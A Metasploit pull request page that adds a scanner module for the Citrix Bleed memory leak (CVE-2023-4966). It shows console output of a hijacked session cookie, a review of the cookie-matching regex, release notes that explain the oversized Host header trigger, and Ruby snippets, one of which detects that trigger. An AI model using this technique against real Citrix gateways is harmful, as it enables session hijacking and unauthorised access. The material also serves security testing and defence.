
Add module for Citrix Bleed (CVE-2023-4966) #18492

Merged (4 commits, Oct 30, 2023)

Conversation

zeroSteiner (Contributor) commented Oct 26, 2023

This adds a module for exploiting CVE-2023-4966 which is a memory leak in Citrix ADC servers that can be used to leak session cookies of authenticated users.

A user needs to be logged in for the vulnerability to be usable to leak a session cookie. While testing my 13.1-48.47 target with multiple users authenticated, it appears that the session cookie that is leaked is consistently the last user that authenticated and not the session cookie of the last request that was received. For that reason, it doesn't make a lot of sense to make multiple attempts to leak cookies in a short time frame as I was originally considering (say 1 request per second over 10 seconds). If the observations are correct, this would only be beneficial and leak multiple cookies if users were logging in within that time period.

Example Output

msf6 auxiliary(scanner/http/citrix_bleed_cve_2023_4966) > show options 

Module options (auxiliary/scanner/http/citrix_bleed_cve_2023_4966):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS     192.168.159.150  yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   RPORT      443              yes       The target port (TCP)
   SSL        true             no        Negotiate SSL/TLS for outgoing connections
   TARGETURI  /                yes       Base path
   THREADS    20               yes       The number of concurrent threads (max one per host)
   VHOST                       no        HTTP server virtual host


View the full module info with the info, or info -d command.

msf6 auxiliary(scanner/http/citrix_bleed_cve_2023_4966) > rerun VERBOSE=true
[*] Reloading module...

[*] Checking cookie: b6e7bf2ef97ef32da90e62f5e4be00b00c3a0818745525d5f4f58455e445a4a42
[+] Cookie: NSC_AAAC=b6e7bf2ef97ef32da90e62f5e4be00b00c3a0818745525d5f4f58455e445a4a42 username: metasploit
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/http/citrix_bleed_cve_2023_4966) >

Closes #18486

@zeroSteiner zeroSteiner marked this pull request as ready for review October 26, 2023 13:54
@smcintyre-r7 smcintyre-r7 added module docs rn-modules release notes for new or majorly enhanced modules labels Oct 26, 2023
@cdelafuente-r7 cdelafuente-r7 self-assigned this Oct 26, 2023
```ruby
return nil unless res.headers['Content-Type'].downcase.start_with?('application/json')

username = nil
res.body.scan(/([0-9a-f]{32,65})/i).each do |cookie|
```
Contributor (review comment):

Suggested change
res.body.scan(/([0-9a-f]{32,65})/i).each do |cookie|
res.body.scan(/([0-9a-f]{65}|[0-9a-f]{32})/i).each do |cookie|

{32,65} means "between 32 and 65 in length". Note that the order is important in my suggestion, since the regex will try to match the first condition (length = 65), and then "length = 32", so that truncation shouldn't happen.

Contributor Author (reply):

I mean to keep it at "between 32 and 65 in length". That was intentional because there were implications that different versions used different sized cookies, but I wasn't clear that it's always either exactly 32 or 65 bytes in length. Ultimately, the cookie's value is tested anyway, so it's unlikely we'd yield false positives. This would just reduce the set that are tested.
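To make the two candidate-extraction patterns discussed above concrete, here is an added example (not code from the PR or from Metasploit) that runs both over a constructed buffer and reports the candidate lengths each one hands to the verification step. The buffer and the token lengths in it are constructed, not real leaked data.

```ruby
# Added example (not part of the PR): compare the two candidate-extraction
# regexes on a constructed buffer. Nothing here talks to a server; it only
# shows which hex runs each pattern yields for later verification.

RANGE_RE = /([0-9a-f]{32,65})/i           # PR as submitted: any length 32..65
EXACT_RE = /([0-9a-f]{65}|[0-9a-f]{32})/i # reviewer's suggestion: exactly 65, else 32

# Return the candidate tokens a regex yields from a buffer, in scan order.
def candidates(buffer, regex)
  buffer.scan(regex).flatten
end

# Summarise candidates as sorted [length, count] pairs for easy comparison.
def length_histogram(tokens)
  tokens.group_by(&:length).map { |len, group| [len, group.size] }.sort
end

# Constructed stand-in for a leaked buffer (not real data). Hex runs are
# separated by non-hex bytes so each run is scanned as a distinct candidate.
SAMPLE_BUFFER = [
  "\x00\x01noise\x00",
  "a" * 65,          # plausible 65-char cookie value
  " | ",
  "b" * 32,          # plausible 32-char cookie value
  " | ",
  "c" * 40,          # 40 hex chars: neither 32 nor 65
  " | ",
  "d" * 97,          # 97 hex chars: a 65-run immediately followed by a 32-run
].join.freeze

# Run both patterns over the same buffer and return their length histograms.
def compare_patterns(buffer = SAMPLE_BUFFER)
  {
    range: length_histogram(candidates(buffer, RANGE_RE)),
    exact: length_histogram(candidates(buffer, EXACT_RE)),
  }
end

puts compare_patterns.inspect if $PROGRAM_NAME == __FILE__
```

Both patterns keep a 65-character run whole (the greedy `{32,65}` is bounded by the surrounding non-hex bytes); the difference is that the range form also surfaces intermediate lengths such as the 40-character run, while the alternation form reduces that run to its first 32 characters.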

Log servers that are vulnerable but don't leak any cookies
cdelafuente-r7 (Contributor) commented:

Thanks @zeroSteiner for updating this. Everything looks good to me; this has been tested against live targets and confirmed the user cookies were retrieved. I'll go ahead and land it.

@cdelafuente-r7 cdelafuente-r7 merged commit ec3cf74 into rapid7:master Oct 30, 2023
34 checks passed
cdelafuente-r7 (Contributor) commented:

Release Notes

This adds a scanner module for exploiting CVE-2023-4966 which is a memory leak in Citrix ADC servers. This vulnerability allows a remote, unauthenticated attacker to leak memory by sending a very large HTTP Host header. The leaked memory is then scanned for session cookies which can be hijacked if found.
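The release note above identifies the trigger as an abnormally large HTTP Host header. As an added, defender-side example (not code from the PR or from Metasploit), the following parses a raw HTTP/1.x request the way a reverse proxy or WAF rule might and flags an oversized Host header; the 253-character threshold is an assumption based on the DNS name-length limit, and the sample requests are constructed.

```ruby
# Added example (not from the PR): flag requests carrying an oversized Host
# header, the trigger condition described in the release note. The threshold
# is an assumption (DNS caps a fully qualified name at 253 characters); tune it
# to the longest legitimate hostname your gateway serves.

MAX_HOST_LEN = 253

# Parse the header block of a raw HTTP/1.x request into a lowercase-keyed hash.
# Returns nil when the request line or any header line is malformed.
def parse_headers(raw)
  head = raw.split(/\r?\n\r?\n/, 2).first.to_s
  request_line, *lines = head.split(/\r?\n/)
  return nil unless request_line =~ %r{\A[A-Z]+ \S+ HTTP/1\.[01]\z}
  lines.each_with_object({}) do |line, headers|
    name, value = line.split(":", 2)
    return nil if value.nil?
    headers[name.strip.downcase] = value.strip
  end
end

# Return a finding hash describing why a request is suspicious, or nil when the
# Host header is present and within the configured limit.
def inspect_host_header(raw)
  headers = parse_headers(raw)
  return { reason: "malformed request" } if headers.nil?
  host = headers["host"]
  return { reason: "missing Host header" } if host.nil?
  return nil if host.length <= MAX_HOST_LEN
  { reason: "oversized Host header", host_length: host.length }
end

# Constructed sample requests (not captured traffic).
NORMAL_REQUEST = "GET / HTTP/1.1\r\nHost: gateway.example.test\r\nUser-Agent: x\r\n\r\n"
OVERSIZED_REQUEST = "GET / HTTP/1.1\r\nHost: #{'a' * 1000}\r\n\r\n"

if $PROGRAM_NAME == __FILE__
  [NORMAL_REQUEST, OVERSIZED_REQUEST].each do |req|
    puts(inspect_host_header(req).inspect)
  end
end
```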

Linked issue: CVE-2023-4966 --- Citrix Bleed: authentication bypass